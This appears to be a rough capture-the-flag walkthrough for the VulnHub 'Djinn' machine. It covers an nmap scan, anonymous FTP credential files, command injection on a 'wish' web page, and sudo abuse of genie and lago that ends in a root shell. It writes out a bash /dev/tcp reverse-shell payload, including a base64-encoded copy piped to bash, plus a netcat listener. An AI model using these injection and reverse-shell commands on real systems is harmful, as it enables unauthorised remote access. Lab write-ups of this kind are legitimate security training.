vulnhub


Diginn

22 June 2022 05:52 PM

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.43.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   11 Oct 20  2019 creds.txt
| -rw-r--r--  128 Oct 21  2019 game.txt
|_-rw-r--r--  113 Oct 21  2019 message.txt
1337/tcp open  waste?
| fingerprint-strings:
|   DNSStatusRequestTCP:
|     [ASCII-art banner]
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|   DNSVersionBindReqTCP:
|     [ASCII-art banner]
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
1 service unrecognized despite returning data.

(kali@kali)-[~/Desktop/ctf/vulnhub/dijinn]
creds.txt  game.txt  message.txt

(kali@kali)-[~/Desktop/ctf/vulnhub/dijinn]
$ cat creds.txt
nitu:81299

(kali@kali)-[~/Desktop/ctf/vulnhub/dijinn]
$ cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

(kali@kali)-[~/Desktop/ctf/vulnhub/dijinn]
$ cat message.txt
I am going on holidays for few days, please take care of all the work. And don't mess up anything.

Let's see how good your are.

192.168.43.219:7331/wish

Oh you found me then go on make a wish. This can make all your wishes come true

Execute: id| id | nc -esh 192.168.43.2. id | pwd id&&cat /etc/passwd

sh -i >& /dev/tcp/192.168.43.208/4444 0>&1

Output

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40My4yMDgvNDQ0NCAwPiYx

echo "payload" | base64 -d | bash

192.168.43.219:7331/wish

Oh you found me then go on make a wish. This can make all your wishes come true

Execute: …0NCAwPiYx|base64 -d|bash

(kali@kali)-[~/Desktop/ctf/vulnhub/dijinn]
$ nc -nvlp 4444
listening on [any] 4444
connect to [192.168.43.208] from (UNKNOWN) [192.168.43.219] 49096
sh: 0: can't access tty; job control turned off
$
$
$ id

nitish@djinn:~/.dev$ cd
nitish@djinn:~$ ls -la
total 32
[ls -la listing: .bash_history, .bashrc, .cache, .dev, .gnupg, user.txt]
nitish@djinn:~$ cat user.txt
IOaay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$

sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass, :/usr/local/bin\:/usr/sbin\:/us

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie

genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish

sudo -u sam genie -cmd new
my man
uid=1000(sam)
/bin/s: not found
$ /bin/bahs
/bin/sh: 3: /bin/bahs: not found
$ /bin/bash
sam@djinn:~$

strings /usr/bin/genie

# exit

sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass, :/usr/local/bin\:/usr/

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago

sam@djinn:~$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - work
Enter your choice: 2
Choose a number between 1 to 100:
Enter your number: num
# is
/bin/sh: 1: is: not found
# id
uid=0(root) gid=0(root) groups=0(root)

We can also use lxd to escalate privileges.